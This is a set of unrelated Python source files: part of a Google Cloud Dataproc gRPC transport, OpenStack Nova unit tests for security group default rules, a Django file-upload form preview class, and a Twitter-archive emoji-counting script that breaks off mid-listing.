Callable[[~.GetClusterRequest],
~.Cluster]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_cluster" not in self._stubs:
self._stubs["get_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/GetCluster",
request_serializer=clusters.GetClusterRequest.serialize,
response_deserializer=clusters.Cluster.deserialize,
)
return self._stubs["get_cluster"]
@property
def list_clusters(
self,
) -> Callable[[clusters.ListClustersRequest], clusters.ListClustersResponse]:
r"""Return a callable for the list clusters method over gRPC.
Lists all regions/{region}/clusters in a project
alphabetically.
Returns:
Callable[[~.ListClustersRequest],
~.ListClustersResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_clusters" not in self._stubs:
self._stubs["list_clusters"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/ListClusters",
request_serializer=clusters.ListClustersRequest.serialize,
response_deserializer=clusters.ListClustersResponse.deserialize,
)
return self._stubs["list_clusters"]
@property
def diagnose_cluster(
self,
) -> Callable[[clusters.DiagnoseClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the diagnose cluster method over gRPC.
Gets cluster diagnostic information. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
After the operation completes,
[Operation.response][google.longrunning.Operation.response]
contains
`DiagnoseClusterResults <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#diagnoseclusterresults>`__.
Returns:
Callable[[~.DiagnoseClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "diagnose_cluster" not in self._stubs:
self._stubs["diagnose_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/DiagnoseCluster",
request_serializer=clusters.DiagnoseClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["diagnose_cluster"]
def close(self):
self.grpc_channel.close()
__all__ = ("ClusterControllerGrpcTransport",)
|
|
# Copyright 2013 Metacloud, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
import webob
from nova.api.openstack.compute.legacy_v2.contrib import \
security_group_default_rules as security_group_default_rules_v2
from nova.api.openstack.compute import \
security_group_default_rules as security_group_default_rules_v21
from nova import context
import nova.db
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
CONF = cfg.CONF
class AttrDict(dict):
def __getattr__(self, k):
return self[k]
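    # Lets test fixtures expose dict keys as attributes,
    # e.g. AttrDict({'id': 1}).id == 1.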
def security_group_default_rule_template(**kwargs):
rule = kwargs.copy()
rule.setdefault('ip_protocol', 'TCP')
rule.setdefault('from_port', 22)
rule.setdefault('to_port', 22)
rule.setdefault('cidr', '10.10.10.0/24')
return rule
def security_group_default_rule_db(security_group_default_rule, id=None):
attrs = security_group_default_rule.copy()
if id is not None:
attrs['id'] = id
return AttrDict(attrs)
class TestSecurityGroupDefaultRulesNeutronV21(test.TestCase):
controller_cls = (security_group_default_rules_v21.
SecurityGroupDefaultRulesController)
def setUp(self):
self.flags(security_group_api='neutron')
super(TestSecurityGroupDefaultRulesNeutronV21, self).setUp()
self.controller = self.controller_cls()
def test_create_security_group_default_rule_not_implemented_neutron(self):
sgr = security_group_default_rule_template()
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.create,
req, {'security_group_default_rule': sgr})
def test_security_group_default_rules_list_not_implemented_neutron(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.index,
req)
def test_security_group_default_rules_show_not_implemented_neutron(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.show,
req, '602ed77c-a076-4f9b-a617-f93b847b62c5')
def test_security_group_default_rules_delete_not_implemented_neutron(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.delete,
req, '602ed77c-a076-4f9b-a617-f93b847b62c5')
class TestSecurityGroupDefaultRulesNeutronV2(test.TestCase):
controller_cls = (security_group_default_rules_v2.
SecurityGroupDefaultRulesController)
class TestSecurityGroupDefaultRulesV21(test.TestCase):
controller_cls = (security_group_default_rules_v21.
SecurityGroupDefaultRulesController)
def setUp(self):
super(TestSecurityGroupDefaultRulesV21, self).setUp()
self.controller = self.controller_cls()
self.req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules')
def test_create_security_group_default_rule(self):
sgr = security_group_default_rule_template()
sgr_dict = dict(security_group_default_rule=sgr)
res_dict = self.controller.create(self.req, sgr_dict)
security_group_default_rule = res_dict['security_group_default_rule']
self.assertEqual(security_group_default_rule['ip_protocol'],
sgr['ip_protocol'])
self.assertEqual(security_group_default_rule['from_port'],
sgr['from_port'])
self.assertEqual(security_group_default_rule['to_port'],
sgr['to_port'])
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
sgr['cidr'])
def test_create_security_group_default_rule_with_no_to_port(self):
sgr = security_group_default_rule_template()
del sgr['to_port']
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_from_port(self):
sgr = security_group_default_rule_template()
del sgr['from_port']
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_ip_protocol(self):
sgr = security_group_default_rule_template()
del sgr['ip_protocol']
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_cidr(self):
sgr = security_group_default_rule_template()
del sgr['cidr']
res_dict = self.controller.create(self.req,
{'security_group_default_rule': sgr})
security_group_default_rule = res_dict['security_group_default_rule']
self.assertNotEqual(security_group_default_rule['id'], 0)
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
'0.0.0.0/0')
def test_create_security_group_default_rule_with_blank_to_port(self):
sgr = security_group_default_rule_template(to_port='')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_blank_from_port(self):
sgr = security_group_default_rule_template(from_port='')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_blank_ip_protocol(self):
sgr = security_group_default_rule_template(ip_protocol='')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_blank_cidr(self):
sgr = security_group_default_rule_template(cidr='')
res_dict = self.controller.create(self.req,
{'security_group_default_rule': sgr})
security_group_default_rule = res_dict['security_group_default_rule']
self.assertNotEqual(security_group_default_rule['id'], 0)
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
'0.0.0.0/0')
def test_create_security_group_default_rule_non_numerical_to_port(self):
sgr = security_group_default_rule_template(to_port='invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_non_numerical_from_port(self):
sgr = security_group_default_rule_template(from_port='invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_ip_protocol(self):
sgr = security_group_default_rule_template(ip_protocol='invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_cidr(self):
sgr = security_group_default_rule_template(cidr='10.10.2222.0/24')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_to_port(self):
sgr = security_group_default_rule_template(to_port='666666')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_from_port(self):
sgr = security_group_default_rule_template(from_port='666666')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_body(self):
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, None)
def test_create_duplicate_security_group_default_rule(self):
sgr = security_group_default_rule_template()
self.controller.create(self.req, {'security_group_default_rule': sgr})
self.assertRaises(webob.exc.HTTPConflict, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_security_group_default_rules_list(self):
self.test_create_security_group_default_rule()
rules = [dict(id=1,
ip_protocol='TCP',
from_port=22,
to_port=22,
ip_range=dict(cidr='10.10.10.0/24'))]
expected = {'security_group_default_rules': rules}
res_dict = self.controller.index(self.req)
self.assertEqual(res_dict, expected)
@mock.patch('nova.db.security_group_default_rule_list',
side_effect=(exception.
SecurityGroupDefaultRuleNotFound("Rule Not Found")))
def test_non_existing_security_group_default_rules_list(self,
mock_sec_grp_rule):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, self.req)
def test_default_security_group_default_rule_show(self):
sgr = security_group_default_rule_template(id=1)
self.test_create_security_group_default_rule()
res_dict = self.controller.show(self.req, '1')
security_group_default_rule = res_dict['security_group_default_rule']
self.assertEqual(security_group_default_rule['ip_protocol'],
sgr['ip_protocol'])
self.assertEqual(security_group_default_rule['to_port'],
sgr['to_port'])
self.assertEqual(security_group_default_rule['from_port'],
sgr['from_port'])
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
sgr['cidr'])
@mock.patch('nova.db.security_group_default_rule_get',
side_effect=(exception.
SecurityGroupDefaultRuleNotFound("Rule Not Found")))
def test_non_existing_security_group_default_rule_show(self,
mock_sec_grp_rule):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, self.req, '1')
def test_delete_security_group_default_rule(self):
sgr = security_group_default_rule_template(id=1)
self.test_create_security_group_default_rule()
self.called = False
def security_group_default_rule_destroy(context, id):
self.called = True
def return_security_group_default_rule(context, id):
self.assertEqual(sgr['id'], id)
return security_group_default_rule_db(sgr)
self.stubs.Set(nova.db, 'security_group_default_rule_destroy',
security_group_default_rule_destroy)
self.stubs.Set(nova.db, 'security_group_default_rule_get',
return_security_group_default_rule)
self.controller.delete(self.req, '1')
self.assertTrue(self.called)
@mock.patch('nova.db.security_group_default_rule_destroy',
side_effect=(exception.
SecurityGroupDefaultRuleNotFound("Rule Not Found")))
def test_non_existing_security_group_default_rule_delete(
self, mock_sec_grp_rule):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, self.req, '1')
def test_security_group_ensure_default(self):
sgr = security_group_default_rule_template(id=1)
self.test_create_security_group_default_rule()
ctxt = context.get_admin_context()
setattr(ctxt, 'project_id', 'new_project_id')
sg = nova.db.security_group_ensure_default(ctxt)
rules = nova.db.security_group_rule_get_by_security_group(ctxt, sg.id)
security_group_rule = rules[0]
self.assertEqual(sgr['id'], security_group_rule.id)
self.assertEqual(sgr['ip_protocol'], security_group_rule.protocol)
self.assertEqual(sgr['from_port'], security_group_rule.from_port)
self.assertEqual(sgr['to_port'], security_group_rule.to_port)
self.assertEqual(sgr['cidr'], security_group_rule.cidr)
class TestSecurityGroupDefaultRulesV2(test.TestCase):
controller_cls = (security_group_default_rules_v2.
SecurityGroupDefaultRulesController)
def setUp(self):
super(TestSecurityGroupDefaultRulesV2, self).setUp()
self.req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.non_admin_req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules')
def test_create_security_group_default_rules_with_non_admin(self):
self.controller = self.controller_cls()
sgr = security_group_default_rule_template()
sgr_dict = dict(security_group_default_rule=sgr)
self.assertRaises(exception.AdminRequired, self.controller.create,
self.non_admin_req, sgr_dict)
def test_delete_security_group_default_rules_with_non_admin(self):
self.controller = self.controller_cls()
self.assertRaises(exception.AdminRequired,
self.controller.delete, self.non_admin_req, 1)
class SecurityGroupDefaultRulesPolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(SecurityGroupDefaultRulesPolicyEnforcementV21, self).setUp()
self.controller = (security_group_default_rules_v21.
SecurityGroupDefaultRulesController())
self.req = fakes.HTTPRequest.blank('')
def _common_policy_check(self, func, *arg, **kwarg):
rule_name = "os_compute_api:os-security-group-default-rules"
rule = {rule_name: "project:non_fake"}
self.policy.set_rules(rule)
exc = self.assertRaises(
exception.PolicyNotAuthorized, func, *arg, **kwarg)
self.assertEqual(
"Policy doesn't allow %s to be performed." %
rule_name, exc.format_message())
def test_create_policy_failed(self):
self._common_policy_check(self.controller.create, self.req, {})
def test_show_policy_failed(self):
self._common_policy_check(
self.controller.show, self.req, fakes.FAKE_UUID)
def test_delete_policy_failed(self):
self._common_policy_check(
self.controller.delete, self.req, fakes.FAKE_UUID)
def test_index_policy_failed(self):
self._common_policy_check(self.controller.index, self.req)
|
|
"""
File Formtools Preview application.
Based on django.contrib.formtools.FormPreview
"""
try:
import cPickle as pickle
except ImportError:
import pickle
from copy import deepcopy, copy
from django import forms
from django.conf import settings
from django.http import Http404
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from django.utils.hashcompat import md5_constructor
from django.utils.crypto import constant_time_compare
from file_formpreview.forms.decorators import preview_full_clean, post_full_clean
from file_formpreview.forms.utils import security_hash
from file_formpreview.forms.fields import *
from file_formpreview.forms.widgets import *
PREVIEW_SUFFIX = getattr(settings, 'PREVIEW_SUFFIX', '_preview') # suffix to preview fields
PATH_SUFFIX = getattr(settings, 'PATH_SUFFIX', '_path') # suffix to preview fields
AUTO_ID = 'formtools_%s' # Each form here uses this as its auto_id parameter.
__all__ = ('FileFormPreview',)
class FileFormPreview(object):
preview_template = 'file_formpreview/preview.html'
form_template = 'file_formpreview/form.html'
def __init__(self, form_klass):
"UPD: make self.form dynamic"
self._form_klass = form_klass
self.state = {}
@property
def form(self):
"""
Lazy evaluted Form class to inject some fields into form declaration
ONLY on the first stage.
It's a bit hacky, as the whole form.data is passed into
`form.FIELD_NEEDED_CUSTOM_PREVIEW.custom_widget.value_from_datadict`
But as it's used TWICE:
in BoundField.data (used to output preview stage) and
in _clean for fields
so, we CANNOT rewrite returned value
from `widget.value_from_datadict`
(it's used in validation further)
Btw, http.QueryDict is immutable, too
"""
        assert getattr(self, 'method', None) is not None, \
            '%(cls)s.form was accessed before %(cls)s was called; no %(cls)s.method defined' % \
            {'cls': self.__class__.__name__}
        assert getattr(self, 'stage', None) is not None, \
            '%(cls)s.form was accessed before %(cls)s was called; no %(cls)s.stage defined' % \
            {'cls': self.__class__.__name__}
#if not self._preview_form_klass:
bases = (self._form_klass,)
name = self._form_klass.__name__ + 'Preview'
namespace = self._form_klass.__dict__.copy()
additional_fields = {}
for fname, field in namespace['base_fields'].iteritems():
if isinstance(field, forms.FileField):
additional_fields.update({
fname + PATH_SUFFIX: PreviewPathField(
                        label='%s%s' % (fname, PATH_SUFFIX.lower()),
required=False)})
if isinstance(field, PreviewField):
additional_fields.update({
fname + PREVIEW_SUFFIX: forms.Field(
label='%s%s' % (fname, PREVIEW_SUFFIX.lower()),
required=False,
widget=((self.stage == 'preview' and self.method == 'post') and \
field.preview_widget or forms.HiddenInput))})
def init_wrapper(self, *args, **kwargs):
"""
Post init stage to update `fields` property
"""
super(self.__class__, self).__init__(*args, **kwargs)
self.fields.update(additional_fields)
self._preview_form_klass = type(name, bases, namespace)
self._preview_form_klass.__init__ = init_wrapper
if self.stage == 'preview' and self.method == 'post':
self._preview_form_klass.full_clean = preview_full_clean
elif self.stage == 'post' and self.method == 'post':
self._preview_form_klass.full_clean = post_full_clean
#assert self._form_klass.__dict__['base_fields'] != self._preview_form_klass.__dict__['base_fields'], 'preview & original forms are equal'
return self._preview_form_klass
def __call__(self, request, *args, **kwargs):
"UPD: store current stage"
self.stage = {'1': 'preview', '2': 'post'}.get(request.POST.get(self.unused_name('stage')), 'preview')
self.method = request.method.lower()
self.parse_params(*args, **kwargs)
try:
method = getattr(self, self.stage + '_' + request.method.lower())
except AttributeError:
raise Http404
return method(request)
def unused_name(self, name):
"""
Given a first-choice name, adds an underscore to the name until it
reaches a name that isn't claimed by any field in the form.
This is calculated rather than being hard-coded so that no field names
are off-limits for use in the form.
UPD: Fixed form class pointer
"""
while 1:
try:
f = self._form_klass.base_fields[name]
except KeyError:
break # This field name isn't being used by the form.
name += '_'
return name
def preview_get(self, request):
"Displays the form"
f = self.form(auto_id=self.get_auto_id(), initial=self.get_initial(request))
return render_to_response(self.form_template,
self.get_context(request, f),
context_instance=RequestContext(request))
def preview_post(self, request):
"""
Validates the POST data. If valid, displays the preview page. Else, redisplays form.
UPD: takes FILES, gives original form
"""
f = self.form(request.POST, request.FILES, auto_id=self.get_auto_id())
orig_form = self._form_klass(request.POST, request.FILES)
if f.is_valid():
context = self.get_context(request, f)
self.process_preview(request, f, context)
context['hash_field'] = self.unused_name('hash')
context['hash_value'] = self.security_hash(request, f)
context['original_form'] = orig_form
return render_to_response(self.preview_template, context, context_instance=RequestContext(request))
else:
context = self.get_context(request, orig_form)
return render_to_response(self.form_template, context, context_instance=RequestContext(request))
def _check_security_hash(self, token, request, form):
expected = self.security_hash(request, form)
        return constant_time_compare(token, expected)
def post_post(self, request):
"""
Validates the POST data. If valid, calls done(). Else, redisplays form.
UPD: takes FILES
"""
f = self.form(request.POST, request.FILES, auto_id=self.get_auto_id())
if f.is_valid():
if not self._check_security_hash(request.POST.get(self.unused_name('hash'), ''),
request, f):
return self.failed_hash(request) # Security hash failed.
return self.done(request, f.cleaned_data)
else:
f = self._form_klass(request.POST, request.FILES, auto_id=self.get_auto_id())
return render_to_response(self.form_template,
self.get_context(request, f),
context_instance=RequestContext(request))
# METHODS SUBCLASSES MIGHT OVERRIDE IF APPROPRIATE ########################
def get_auto_id(self):
"""
Hook to override the ``auto_id`` kwarg for the form. Needed when
rendering two form previews in the same template.
"""
return AUTO_ID
def get_initial(self, request):
"""
Takes a request argument and returns a dictionary to pass to the form's
``initial`` kwarg when the form is being created from an HTTP get.
"""
return {}
def get_context(self, request, form):
"Context for template rendering."
return {'form': form, 'stage_field': self.unused_name('stage'), 'state': self.state}
def parse_params(self, *args, **kwargs):
"""
Given captured args and kwargs from the URLconf, saves something in
self.state and/or raises Http404 if necessary.
For example, this URLconf captures a user_id variable:
(r'^contact/(?P<user_id>\d{1,6})/$', MyFormPreview(MyForm)),
In this case, the kwargs variable in parse_params would be
{'user_id': 32} for a request to '/contact/32/'. You can use that
user_id to make sure it's a valid user and/or save it for later, for
use in done().
"""
pass
def process_preview(self, request, form, context):
"""
Given a validated form, performs any extra processing before displaying
the preview page, and saves any extra data in context.
"""
pass
def security_hash(self, request, form):
"""
Calculates the security hash for the given HttpRequest and Form instances.
Subclasses may want to take into account request-specific information,
such as the IP address.
"""
return security_hash(form)
def failed_hash(self, request):
"Returns an HttpResponse in the case of an invalid security hash."
return self.preview_post(request)
# METHODS SUBCLASSES MUST OVERRIDE ########################################
def done(self, request, cleaned_data):
"""
Does something with the cleaned_data and returns an
HttpResponseRedirect.
"""
raise NotImplementedError('You must define a done() method on your %s subclass.' % self.__class__.__name__)
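# A minimal subclass sketch (names are illustrative, not part of this module):
#
#   class MyUploadPreview(FileFormPreview):
#       def done(self, request, cleaned_data):
#           handle_upload(cleaned_data)  # hypothetical helper
#           return HttpResponseRedirect('/thanks/')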
|
|
#!/usr/bin/env python
# encoding: utf-8
"""
Search a Twitter archive (from archive.org) to find all characters related to time.
Finds distributions of those and all other emoji in the tweets.
-p : Path to the Twitter archive
-d : How many days to search (for testing)
-hr : How many hours to search (for testing)
"""
import argparse
import multiprocessing
from timeit import default_timer as timer
import pandas as pd
from tqdm import tqdm
from twitter_search import find_all, find_all_if, sum_dicts
from twitter_search.data import get_all_files, read_zip, unpack_files
from twitter_search.unicode_codes import EMOJI_UNICODE
class Results:
"""Search results data class.
Attributes:
counter_total_match (int): Total number of tweets with a match character
counter_total_tweets (int): Total number of tweets
counter_total_tweets_wemoji (int): Total number of tweets with any emoji
counterdict_lang (dict): Distribution of tweet languages
counterdict_all_emoji (dict): Distribution of all emoji
counterdict_all_emoji_if_match (dict): Distribution of all emoji when match is found
"""
def __init__(self):
"""Initialize all counters to 0 and counter dicts to be empty."""
self.counter_total_tweets = 0
self.counter_total_tweets_wemoji = 0
self.counter_total_match = 0
self.counterdict_lang = {}
self.counterdict_all_emoji = {}
self.counterdict_all_emoji_if_match = {}
self.counterdict_all_emoji_if_clockfaces = {}
self.counterdict_all_emoji_if_hourglasses = {}
self.counterdict_all_emoji_if_soon = {}
self.counterdict_all_emoji_if_watch = {}
self.counterdict_all_emoji_if_stopwatch = {}
self.counterdict_all_emoji_if_mantelpiece_clock = {}
self.counterdict_all_emoji_if_timer_clock = {}
self.counterdict_all_emoji_if_alarm_clock = {}
def add_to(self, key, val, attr):
"""Adds a value to an given dictionary key for a given attribiute of the class.
Args:
key (str)
val (int)
attr (str)
"""
        d = getattr(self, attr)
        d[key] = d.get(key, 0) + val
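    # e.g. results.add_to(emoji_char, 2, 'counterdict_all_emoji') adds two
    # occurrences of emoji_char to the overall emoji tally.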
def worker(filename):
"""The worker function, invoked in a process.
Args:
filename (str): Zipped file of tweets to process
Returns:
Results
"""
results = Results()
for tweet in read_zip(filename):
# Count total number of tweets
results.counter_total_tweets += 1
# Count total numbers of emoji in tweet
all_emoji, all_count = find_all(tweet["text"])
if not all_emoji:
continue
results.counter_total_tweets_wemoji += 1
for i, c in enumerate(all_emoji):
            if c in results.counterdict_all_emoji:
results.counterdict_all_emoji[c] += all_count[i]
else:
results.counterdict_all_emoji[c] = all_count[i]
# Count total numbers of emoji in tweet when there is a match
all_emoji, all_count = find_all_if(tweet["text"], MATCHES_ALL)
if not all_emoji:
continue
results.counter_total_match += 1
for i, c in enumerate(all_emoji):
            if c in results.counterdict_all_emoji_if_match:
results.counterdict_all_emoji_if_match[c] += all_count[i]
else:
results.counterdict_all_emoji_if_match[c] = all_count[i]
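        # NOTE: the language tally below only counts tweets that contained a
        # match; tweets without one were skipped by the `continue` above.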
try:
if tweet["lang"] in results.counterdict_lang.keys():
results.counterdict_lang[tweet["lang"]] += 1
else:
results.counterdict_lang[tweet["lang"]] = 1
except KeyError:
continue
# Count total numbers of emoji in tweet for each match subset
for group in MATCHES:
all_emoji, all_count = find_all_if(tweet["text"], MATCHES[group])
if not all_emoji:
continue
for i, c in enumerate(all_emoji):
attr_name = "counterdict_all_emoji_if_{}".format(group)
results.add_to(c, all_count[i], attr_name)
return results
def parse_cli_args():
"""Parse the require CLI arguments for the run.
Returns:
argparse.Namespace
"""
parser = argparse.ArgumentParser(
description="Search a Twitter archive (from archive.org)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"-p",
"--data_path",
default="/your/data/path/archive-twitter-2016-08/",
help="Path to the Twitter archive",
)
parser.add_argument(
"-d", "--days", type=int, default=31, help="How many days to search (for testing)"
)
parser.add_argument(
"-hr", "--hours", type=int, default=24, help="How many hours to search (for testing)"
)
parser.add_argument(
"-u", "--unpack", default=False, action="store_true", help="Unpack tar files"
)
return parser.parse_args()
def run():
"""Run the full search.
Returns:
Results
"""
start_t = timer()
# Global counters
results_global = Results()
# Set multiprocessing cpu count
number_of_processes = multiprocessing.cpu_count()
multiprocessing.freeze_support() # Prevent an error on Windows
# Create pool of processes
pool = multiprocessing.Pool(number_of_processes)
try:
# Run worker functions and use tqdm progress bar
processes = pool.imap_unordered(worker, all_files, chunksize=10)
for results in tqdm(processes, total=len(all_files), unit="files"):
if results is None:
continue
# Update all global counters
results_global.counter_total_tweets += results.counter_total_tweets
results_global.counter_total_tweets_wemoji += results.counter_total_tweets_wemoji
results_global.counter_total_match += results.counter_total_match
results_global.counterdict_lang = sum_dicts(
results_global.counterdict_lang, results.counterdict_lang
)
results_global.counterdict_all_emoji = sum_dicts(
results_global.counterdict_all_emoji, results.counterdict_all_emoji
)
results_global.counterdict_all_emoji_if_match = sum_dicts(
results_global.counterdict_all_emoji_if_match,
results.counterdict_all_emoji_if_match
)
results_global.counterdict_all_emoji_if_clockfaces = sum_dicts(
results_global.counterdict_all_emoji_if_clockfaces,
results.counterdict_all_emoji_if_clockfaces
)
results_global.counterdict_all_emoji_if_hourglasses = sum_dicts(
results_global.counterdict_all_emoji_if_hourglasses,
results.counterdict_all_emoji_if_hourglasses
)
results_global.counterdict_all_emoji_if_soon = sum_dicts(
results_global.counterdict_all_emoji_if_soon,
results.counterdict_all_emoji_if_soon
)
results_global.counterdict_all_emoji_if_watch = sum_dicts(
results_global.counterdict_all_emoji_if_watch,
results.counterdict_all_emoji_if_watch
)
results_global.counterdict_all_emoji_if_stopwatch = sum_dicts(
results_global.counterdict_all_emoji_if_stopwatch,
results.counterdict_all_emoji_if_stopwatch
)
results_global.counterdict_all_emoji_if_mantelpiece_clock = sum_dicts(
results_global.counterdict_all_emoji_if_mantelpiece_clock,
results.counterdict_all_emoji_if_mantelpiece_clock
)
results_global.counterdict_all_emoji_if_timer_clock = sum_dicts(
results_global.counterdict_all_emoji_if_timer_clock,
results.counterdict_all_emoji_if_timer_clock
)
results_global.counterdict_all_emoji_if_alarm_clock = sum_dicts(
results_global.counterdict_all_emoji_if_alarm_clock,
results.counterdict_all_emoji_if_alarm_clock
)
except KeyboardInterrupt:
print("KeyboardInterrupt")
finally:
pool.terminate()
pool.join()
end_t = timer()
# Print outputs of the search run
print("Elapsed Time : {:.2f} min".format((end_t - start_t) / 60))
print("Total Tweets : {:d}".format(results_global.counter_total_tweets))
print("Total Tweets w/ Emoji : {:d}".format(results_global.counter_total_tweets_wemoji))
print("Total Tweets w/ Match : {:d}".format(results_global.counter_total_match))
return results_global
def save_results(results):
"""Save results to csv."""
# Convert output to dataframe
df_lang = pd.DataFrame(list(results.counterdict_lang.items()), columns=["Lang", "Count"])
df_allemoji = pd.DataFrame(
list(results.counterdict_all_emoji.items()), columns=["Emoji", "Count"]
)
df_allemoji_match = pd.DataFrame(
list(results.counterdict_all_emoji_if_match.items()), columns=["Emoji", "Count"]
)
df_allemoji_clockfaces = pd.DataFrame(
list(results.counterdict_all_emoji_if_clockfaces.items()), columns=["Emoji", "Count"]
)
df_allemoji_hourglasses = pd.DataFrame(
list(results.counterdict_all_emoji_if_hourglasses.items()), columns=["Emoji", "Count"]
)
df_allemoji_soon = pd.DataFrame(
list(results.counterdict_all_emoji_if_soon.items()), columns=["Emoji", "Count"]
)
df_allemoji_watch = pd.DataFrame(
list(results.counterdict_all_emoji_if_watch.items()), columns=["Emoji", "Count"]
)
df_allemoji_stopwatch = pd.DataFrame(
list(results.counterdict_all_emoji_if_stopwatch.items()), columns=["Emoji", "Count"]
)
df_allemoji_mantelpiece_clock = pd.DataFrame(
list(results.counterdict_all_emoji_if_mantelpiece_clock.items()), columns=["Emoji", "Count"]
)
df_allemoji_timer_clock = pd.DataFrame(
list(results.counterdict_all_emoji_if_timer_clock.items()), columns=["Emoji", "Count"]
)
df_allemoji_alarm_clock = pd.DataFrame(
list(results.counterdict_all_emoji_if_alarm_clock.items()), columns=["Emoji", "Count"]
)
# Export results as CSV files
df_lang.to_csv("./langdata.csv", encoding="utf-8")
df_allemoji.to_csv("./allemojidata.csv", encoding="utf-8")
df_allemoji_match.to_csv("./allemojidatamatch.csv", encoding="utf-8")
df_allemoji_clockfaces.to_csv("./allemojidatamatch_clockfaces.csv", encoding="utf-8")
df_allemoji_hourglasses.to_csv("./allemojidatamatch_hourglasses.csv", encoding="utf-8")
df_allemoji_soon.to_csv("./allemojidatamatch_soon.csv", encoding="utf-8")
df_allemoji_watch.to_csv("./allemojidatamatch_watch.csv", encoding="utf-8")
df_allemoji_stopwatch.to_csv("./allemojidatamatch_stopwatch.csv", encoding="utf-8")
df_allemoji_mantelpiece_clock.to_csv("./allemojidatamatch_mantelpiece_clock.csv", encoding="utf-8")
df_allemoji_timer_clock.to_csv("./allemojidatamatch_timer_clock.csv", encoding="utf-8")
df_allemoji_alarm_clock.to_csv("./allemojidatamatch_alarm_clock.csv", encoding="utf-8")
if __name__ == "__main__":
args = parse_cli_args()
# Characters to match
MATCHES = {
"clockfaces": [
# O'clock emoji
EMOJI_UNICODE[":one_o\u2019clock:"],
EMOJI_UNICODE[":two_o\u2019clock:"],
EMOJI_UNICODE[":three_o\u2019clock:"],
EMOJI_UNICODE[":four_o\u2019clock:"],
EMOJI_UNICODE[":five_o\u2019clock:"],
EMOJI_UNICODE[":six_o\u2019clock:"],
EMOJI_UNICODE[":seven_o\u2019clock:"],
EMOJI_UNICODE[":eight_o\u2019clock:"],
EMOJI_UNICODE[":nine_o\u2019clock:"],
EMOJI_UNICODE[":ten_o\u2019clock:"],
EMOJI_UNICODE[":eleven_o\u2019clock:"],
